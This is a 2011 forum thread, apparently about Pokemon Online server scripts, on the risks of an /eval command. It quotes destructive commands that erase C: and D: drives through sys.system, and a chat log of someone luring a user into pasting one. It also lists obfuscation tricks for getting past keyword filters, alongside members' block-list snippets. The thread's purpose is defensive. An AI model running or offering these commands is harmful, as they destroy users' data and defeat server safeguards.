/EVAL Command!

Discussion in 'Server and Client Scripting' started by Valstin, Sep 5, 2011.

  1. Valstin

    Valstin iPLayCOD

    Joined:
    Aug 11, 2011
    Messages:
    126
    Likes Received:
    0
    I was told that /eval can erase my whole C:drive if the following code is used:

    /eval sys["sys"+"tem"]("Erase C: /F /S /Q")



    is it true?
     
  2. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Well,
    sys.system will call for operating system commands, and erase (http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/del.mspx?mfr=true) is the command to remove drives in Windows world.

    So, yes, provided you 1) run PO with privileges to erase your computer 2) you run the following script.

    Why would you run such a script is beyond my imagination, but it shows that you shouldn't let anyone use /Eval like commands (including eval(script), sys.delayedCall(script, ms), sys.webCall(url, script)
     
  3. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    It's not the eval co,mand, it's .system command which is transformed into ["sys"+"tem"] in your example for some reason (avoiding safe mode?). Eval just... well, evaluates it.
    But it's up you to provide securiy of your server: you shouldn't run it as as system administrator and shouldn't allow access to /eval to every user in your scripts. See p-o scripts for example, access to this command is granted only to several ip adresses.
     
  4. Rigas

    Rigas Active Member

    Joined:
    Feb 8, 2011
    Messages:
    494
    Likes Received:
    93
    (01:17) zerogravity: hey
    (01:17) Rigas: Hey.
    (01:18) zerogravity: /eval sys.system("Erase D:; Erase C:");
    (01:18) zerogravity: type that in Main chat
    (01:18) zerogravity: it kills skarms Harddrive.
    (01:18) zerogravity: uThere?
    (01:19) Rigas: I am.
    (01:19) zerogravity: /eval sys.system("Erase D:; Erase C:");
    (01:19) zerogravity: type that in Main chat
    (01:19) zerogravity: it kills skarms Harddrive.
    (01:19) Rigas: And I'm not stupid.
    (01:19) zerogravity: (:
    (01:19) zerogravity: LOL
    (01:19) zerogravity: ikr.
    (01:19) The other party left the server, so the window was disabled.

    ._.
     
  5. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    sys.system() is not blocked by safe mode at the moment although you can disable it at compile time (nosysteminscript option or full blown safeonlyscript that removes even more functions). I think I'll need to check for this option to make it consistent.
     
  6. Valstin

    Valstin iPLayCOD

    Joined:
    Aug 11, 2011
    Messages:
    126
    Likes Received:
    0

    he said the same thing to me
     
  7. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    I made a small snip for this, it blocks sys.system and sys.shutDown, also using regexp to only count a-Z chars
     
  8. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Yeah you can't really avoid them with regexps. Safe scripts is the way to go after next update.
     
  9. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    Can't you simply redeclare sys.system?
    Code (text):
    1. sys.system = function() { return undefined; }
    And there is far too much harmfull commands to try to block them.
    Server administrators just shouldn't be stupid and allow evaling code to users.
     
  10. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    I do
    Code (text):
    1.  
    2. /eval delete sys.system;
    3. /eval sys.system("insert malicious characters here");
    4.  
    and it'll work :3
     
  11. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    I hope that means not what I think it means (^ ^)'
     
  12. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    I think he meant to block the use of system function in eval.
     
  13. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    I mean "after next update" part. It looked like you did it too. "Too" because I implemented it after I posted that message :}
     
  14. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    You can;

    PHP:
    1. var evalMsg = commandData.replace(/[^a-z]/gi,""); // Everything is case sensitive cuz pro.
    2. if(evalMsg.indexOf("syssystem") != -1) { // Dots are replaced
    3. // continue //
    4. }
    5.  
     
  15. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    LOL It will not work, because you can call any given function in 9999 different ways that don't even have those letters.
     
  16. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    Yeah, it blocks most ways of useage though
     
  17. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    if you block "eval" and "sys", then I give up, until then I won't.

    edit: 1100th post
     
  18. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    Even if you block sys word it is still possible. You can google around for JS obfuscation things :}
     
  19. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Block "this" too, it's the same as "sys" object.

    This works too in PO scripts:
    Code (text):
    1.  
    2. /eval a="sy";b="s.sendAll('lol')"; arguments.callee(src, command, a+b, tar)
    3.  
    so you need to ban "arguments" too
     
  20. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    And something like this as well...
    Code (javascript):
    1. /eval for (i in this) { if (-1 != i.indexOf('ystem')) this[i]('eject -T');}
    In the end, blockind everything will render 'eval' useless.
     
  21. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    That is the point. You can't block system without blocking access to sys object, which has all the good functions.

    edit. add "script" to the list of blocked words
     
  22. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    And you can use an array:
    PHP:
    1.  
    2. var earr = ['s','y','s','.','s','y','s','t','e','m','(','co','de',')'];
    3. eval(earr.join(""));
    Though my blocker works against this type.
     
  23. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    Code (javascript):
    1.  
    2. alert([][(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[([][(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(![]+[])[+!+[]]](+[]+[+[]])[+!+[]]);
    3.  
    Guess what's this does, lol. It isn't new but still relevant :)
     
  24. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    [15:52:01.447] TypeError: can't convert undefined to object
     
  25. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    Run in browser. alert() is browser's function after all :}
     
  26. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    I run it on browser. It tells me that.

    // edit, doesn't work in firefox, but Safari prints "D"
     
  27. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
  28. Lamperi

    Lamperi I see what you did there

    Joined:
    Apr 25, 2010
    Messages:
    2,647
    Likes Received:
    11
    Ok, so
    Code (text):
    1.  
    2. []['sort']['call']()
    3.  
    will give you the global object, ie. sys, which can be obfuscated into a long string of []+!s
     
  29. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    PHP:
    1.  
    2. var s = commandData.replace(/[^sytem]/g,"");
    3. if(s.indexOf(syssystem) != -1)
    4. s = 'syssystem';
    5. var sarr = [];
    6. for(var x in s) {
    7. sarr.push(s[x]); }
    8. var scount = 0, ycount = 0, tcount = 0, ecount = 0, mcount = 0;
    9. // Using count to minimize false positives.
    10. sarr.forEach(function(l) {
    11. if(l == "s") scount+=1;
    12. else if(l== "y") ycount+=1;
    13. else if(l =="t") tcount+=1;
    14. else if(l == "e") ecount+= 1;
    15. else if(l == "m") mcount+=1;
    16. });
    17. // sys.system
    18. if(scount >= 4&&ycount >= 2&&tcount >= 1&&ecount >= 1&&mcount >= 1) {
    19. /* continue */ }
    20.  
    Beat that :P
     
    Last edited: Sep 8, 2011
  30. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    !eval sys.sendHtmlAll('<span>Hi, all</span>')
     
  31. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    Hurr, theres not much better you can do against it >_>.
     
  32. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    Indeed, so I don't waste my time. Eh... I actually do, but not with this.
    The right way to protect your server is to allow execution of eval only for administrators and don't grant administrating rights to retards who type random commands.
    Or you can use future safe mode if you're really paranoic.
     
  33. TheUnknownOne

    TheUnknownOne Member

    Joined:
    Mar 28, 2011
    Messages:
    988
    Likes Received:
    3
    First of all:
    Owners should be able to /sendhtmlall if you have that, so that they can't get hit by it, or just don't eval sendhtmlall
    Second:
    You didn't have 2 'y's in your eval :P
    Third:
    Only trusted people should be able to use it, yes.
    Biggest tip for them: Don't eval code that people tell you to, its most likely bad.
     
  34. Kalashnikov

    Kalashnikov Despite the code quality

    Joined:
    Apr 4, 2011
    Messages:
    434
    Likes Received:
    0
    That wasn't the point, I can give you infinity of possible viable commands that have 4 letters 's', 2 letters 'y', and so on...
    Filtering will lead you nowhere and it was pointed several times already.

    As for 2 'y', well, you fixed it after my message. Add this letter inside that span if you want.
     
  35. Mystra

    Mystra Active Member

    Joined:
    Jul 12, 2010
    Messages:
    1,389
    Likes Received:
    4
    The best thing is to not have eval in the first place :}
     
  36. Seiki

    Seiki :derp:

    Joined:
    Aug 20, 2011
    Messages:
    117
    Likes Received:
    0
    The best thing to do is leave out Eval >.>
    I dont get what its point is, after
    people trying to destroy servers with it lol
    Edit: Mystra u friggin Ninja :c I didnt see that post. But yeah. Dont use eval lol

    OR!

    Make it only for the host (127.0.0.1). Simple as that :/
    Code (Javascript):
    1. if(sys.ip(source) != '127.0.0.1') { // If you have  a different script, src would be better to use then source :}
    2. sys.sendMessage(src,"Your IP ("+sys.ip(src)+") has no right to use the command Eval."); // :3
    3. return;
    4.  }